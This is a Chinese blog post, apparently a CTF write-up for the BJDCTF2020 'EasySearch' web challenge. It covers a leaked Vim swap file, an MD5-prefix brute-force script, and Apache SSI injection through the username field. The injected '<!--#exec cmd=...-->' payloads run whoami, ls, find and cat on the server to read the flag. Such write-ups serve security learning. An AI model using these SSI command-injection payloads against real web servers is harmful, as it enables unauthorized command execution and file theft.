[BJDCTF2020]EasySearch 1(shtml)

最新推荐文章于 2024-02-17 12:51:12 发布
最新推荐文章于 2024-02-17 12:51:12 发布
阅读量213 收藏 2
点赞数
分类专栏: 网络安全 文章标签: php python perl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45577185/article/details/120805353
版权

扫描到后台后index.php.swp文件泄露,访问一下得到源码
(反正我是没有扫到,wuwuwu~)
在这里插入图片描述
可以看到password的md5值的前六位要等于6d0bc1
不会写哈,用用别人的

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

在这里插入图片描述
抓包,看到有一个隐藏的url,是shtml
在这里插入图片描述
看到shtml,想到Apache SSI 远程命令执行漏洞,参考:https://cloud.tencent.com/developer/article/1540513
可以上传一个shtml文件,内容为

<!--#exec cmd="whoami" -->

但是这里没有可以上传文件的地方。

回顾一下整个流程,password是固定的值,唯一可控的地方就是username,尝试抓包后更改注入:
在这里插入图片描述
扫描当前目录

<!--#exec cmd="ls"-->

查看当前目录

<!--#exec cmd="pwd"-->

如果文件名叫flag***那么可以找文件

<!--#exec cmd="find / -type f -name flag*"-->

在这里插入图片描述
在这里插入图片描述
cat flag

<!--#exec cmd="cat /var/www/html/flag_990c66bf85a09c664f0b6741840499b2"-->

在这里插入图片描述
在这里插入图片描述
得到flag

满月*
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 2931
buuctf 源码泄露 ssi远程命令执行漏洞
shtml include使用方法
09-28
**SHTML Include 使用方法** SHTML (Server Side Includes) 是一种服务器端的脚本语言,主要用来实现网页的动态包含。这种技术允许开发者将网站中的一些公共部分,如页头、页尾、导航栏或者经常更新的内容,独立为...
[BJDCTF2020]EasySearch 1
shinygod的博客
03-24 157
知识点:Apache SSI 远程命令执行 分析 先输入几个数测试一下,会弹出个框,但并不是前端验证,sql注入也没有用。 跑遍目录,有个index.php.swp 进去能看到一串代码,首先要username存在,且password加密后前六个字符要等于$admin,那爆破一下呗 #https://blog.csdn.net/SopRomeo/article/details/105225341 import hashlib for i in range(1000000000): a = h
buuCTF [BJDCTF2020]EasySearch 1
weixin_45642610的博客
04-14 1590
buuCTF [BJDCTF2020]EasySearch 1 进去后是这样 扫后台发现index.php.swp备份。 这里吐槽一下。我用dirsearch扫了3次都没出来,最后用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。 要求password的md5值的前6个字符为6d0bc1。敲代码(python): from hashlib import md5 for i in range(10000000): if md5(str(i).
添加新的.shtml的影射
01-10
可以在IIS中,为单独的主机增加.shtm及.shtml的影射执行文件是:C:\WINDOWS\system32\inetsrv\ssinc.dll动作是:GET,POST也可以为整台服务器的主机加上: 在管理区—虚拟主机服务器设置的ASP影射中加上: .shtm,C:\...
php生成shtml类用法实例
10-25
然后,我们创建了`Shtml`类的一个实例,并设置了生成的SHTML文件名和模板。模板中,`<FIELD_title>`和`<FIELD_content>`是占位符,它们将在`Create()`方法中被动态数据替换。最后,通过调用`BindData()`方法绑定数据...
dhtml shtml xhtml的区别解析
10-30
DHTML、SHTML和XHTML都是与网页制作和动态网页技术相关的概念,它们各自具有不同的特点和用途。 首先,DHTML(Dynamic HTML)并非一种独立的技术或标准,而是结合了HTML、CSS、JavaScript以及DOM(Document Object ...
windows2003 shtml支持设置方法
09-30
1. 打开IIS管理控制台,找到你要配置的网站或虚拟目录。 2. 在右侧面板中,选择“属性”或右键单击并选择“属性”选项。 3. 在打开的“属性”对话框中,找到“文档”或“MIME类型”选项卡。 4. 在“MIME类型”区域,...
BUUCTF-WEB 【BJDCTF2020EasySearch 1
qq_36410265的博客
02-08 309
SSI(服务端包含)
BUUCTF [BJDCTF2020]EasySearch 1
qq_56313338的博客
09-25 165
.swp” 后缀通常用于表示 Vim(一种文本编辑器)的交换文件。Vim 是一个强大的文本编辑器,它在编辑文件时会创建交换文件以确保文件内容的安全性。
[BJDCTF2020]EasySearch
qq_43801002的博客
08-03 173
题目 过程 1.主页面尝试注入,无果。御剑扫描后台发现index.php.swp文件。访问可以看到后端程序。 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
BUUCTF [BJDCTF2020]EasySearch
qq_53863234的博客
12-05 2870
Apache SSI 远程命令执行漏洞
[BJDCTF2020]EasySearch1 不会编程的崽
最新发布
不会编程的崽的博客
02-17 658
dirmap后台文件扫描,shtml ssl注入
[BJDCTF2020]EasySearch——ssi
m0_62879498的博客
05-14 448
[BJDCTF2020]EasySearch 1 和上一关相似 是 源码泄露 使用御剑对目录进行扫描 发现了 index.php.swp 0X01 源码分析 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars
[BJDCTF2020]EasySearch(ssi漏洞)
Yang_99的博客
09-26 371
1.首页御剑扫描可以发现有index.php.swp,可以查看源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
我的CTF学习与教学之旅笔记8
lm19770429的专栏
04-07 218
ssl注入
python 爬取.shtml
08-20
要爬取.shtml后缀的网页,您可以使用 Python 中的 requests 和 BeautifulSoup 库。首先,您需要安装这两个库: ``` pip install requests pip install beautifulsoup4 ``` 然后,可以使用以下示例代码来获取.shtml...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值